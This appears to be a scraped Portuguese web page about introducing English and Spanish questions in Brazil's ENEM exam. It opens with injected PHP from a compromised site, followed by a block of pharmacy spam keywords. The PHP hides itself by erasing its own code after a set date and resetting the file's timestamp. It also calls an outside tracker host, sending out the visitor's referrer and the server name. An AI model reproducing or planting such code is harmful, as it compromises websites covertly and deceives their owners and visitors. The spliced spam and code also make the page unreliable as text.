check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456733914){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=15&id=18776881&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_newsfeeds/models/models.php"); } Introdução da prova de língua estrangeira inglês (e espanhol) no ENEM order serpina himalaya buy blopress vidal cheap vpxl ingredients flovent hfa discount card buy dostinex japan cheap cholesterol lower cholesterol.com cheap cytotec zwaneven buy zyprexa vancouver buy albenza dosage order trandate spc cheap ventolin eldepryl discount voucher order kamagra yumbel buy atorlip 20 mg tablets liv 52 discount vitamin shoppe buy rogaine 5 vs 10 buy xenical vallejo order actors by name in reversed alphabetical order cheap anxiety pills order glucotrol xl obat

Introdução da prova de língua estrangeira inglês (e espanhol) no ENEM

ImprimirE-mail

A reformulação do Exame Nacional do Ensino Médio-ENEM possibilitou o seu uso como forma de seleção para ingresso dos estudantes nas universidades. Os objetivos dessa reformulação são democratizar as oportunidades de acesso às universidades federais, possibilitar mobilidade acadêmica e induzir uma reestruturação dos currículos do ensino médo. Em 2010, o Exame conta pela primeira vez com questões de língua estrangeira – inglês e espanhol. O Edital do Exame publicado no site do INEP neste mesmo ano apresenta como objetivo das provas de línguas estrangeiras “conhecer e usar língua(s) estrangeira(s) moderna(s) como instrumento de acesso a informações e a outras culturas e grupos sociais”, o que implica tanto em aprender sobre fatos da língua-alvo como aprender a usar a língua-alvo.